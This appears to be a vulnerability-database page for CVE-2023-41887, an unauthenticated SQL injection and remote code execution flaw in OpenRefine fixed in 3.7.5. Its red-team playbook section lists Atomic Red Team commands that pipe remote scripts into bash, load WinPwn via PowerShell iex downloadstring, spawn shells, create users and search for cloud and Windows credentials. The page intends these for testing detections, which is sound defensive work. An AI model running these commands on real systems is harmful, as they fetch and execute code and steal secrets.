CVE-2023-41887
Overview
This vulnerability is a SQL injection flaw (CWE-89) in OpenRefine versions prior to 3.7.5. The root cause is improper sanitization of user-supplied input in database query construction, allowing injection of arbitrary SQL commands. The affected component is the server-side data processing module responsible for handling user requests involving data transformations and queries.
Vulnerability Description
OpenRefine is a powerful free, open source tool for working with messy data. Prior to version 3.7.5, a remote code execution vulnerability allows any unauthenticated user to execute code on the server. Version 3.7.5 has a patch for this issue.
Impact
An attacker can execute arbitrary code on the OpenRefine server without authentication, leveraging the SQL injection to escalate privileges and run system commands. This leads to complete compromise of the server hosting OpenRefine, including potential access to sensitive data and disruption of service. The vulnerability is remotely exploitable (AV:N), requires no privileges (PR:N), no user interaction (UI:N), and affects confidentiality, integrity, and availability at a high level (C:H/I:H/A:H) as indicated by the CVSS 3.1 vector.
Solution
To remediate this vulnerability, upgrade OpenRefine to version 3.7.5 or later, where the issue has been patched. Refer to the official OpenRefine security advisory GHSA-p3r5-x3hr-gpg5 and the patch commit 693fde606d4b5b78b16391c29d110389eb605511 on GitHub for detailed instructions. No workarounds are documented; applying the update is the recommended mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
OpenRefine, a widely used open-source tool for data cleaning and transformation, has been found to harbor a critical vulnerability that allows for remote code execution. This flaw arises from improper handling of user input, enabling an unauthenticated attacker to send specially crafted requests to the server. The vulnerability exists in versions prior to 3.7.5, where the application fails to adequately validate and sanitize input data, leading to the potential execution of arbitrary code on the server. This can result in unauthorized access to sensitive data, manipulation of data, or complete system compromise, depending on the attacker's intent and the server's configuration.
The attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. Since the flaw allows unauthenticated users to execute code, an attacker could craft a malicious payload and send it to the OpenRefine server over the network. This could be accomplished through various means, such as phishing campaigns that direct users to a compromised instance of OpenRefine or by scanning for exposed servers running vulnerable versions of the software. Once the payload is executed, the attacker could gain control of the server, leading to further exploitation of the system or lateral movement within the network.
The real-world impact of this vulnerability is significant, especially for organizations that rely on OpenRefine for data processing. The potential for unauthorized code execution poses severe business risks, including data breaches, loss of sensitive information, and reputational damage. Organizations may face regulatory penalties if they fail to protect user data adequately. Additionally, the operational disruption caused by a successful attack could lead to financial losses and a decrease in customer trust. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that it should be prioritized for remediation.
To detect and mitigate this vulnerability, organizations should first ensure that they are running the latest version of OpenRefine, specifically version 3.7.5 or later, which includes the necessary patches. Regular software updates and patch management are essential practices in maintaining a secure environment. Furthermore, organizations should implement network security measures, such as firewalls and intrusion detection systems, to monitor and control access to the OpenRefine server. Conducting regular security assessments and penetration testing can help identify potential weaknesses in the system before they can be exploited. Additionally, educating users about the risks associated with data processing tools and promoting secure coding practices can further reduce the likelihood of exploitation.
In conclusion, the remote code execution vulnerability in OpenRefine represents a critical threat to organizations utilizing this powerful data management tool. The ease of exploitation and the potential for significant impact necessitate immediate attention from security teams. By implementing robust detection and mitigation strategies, organizations can protect themselves against this and similar vulnerabilities, ensuring the integrity and security of their data processing activities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Openrefine | Openrefine | All |
cpe:2.3:a:openrefine:openrefine:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-41887 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/OpenRefine/OpenRefine/security/advisories/GHSA-p3r5-x3hr-gpg5 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/OpenRefine/OpenRefine/commit/693fde606d4b5b78b16391c29d110389eb605511 |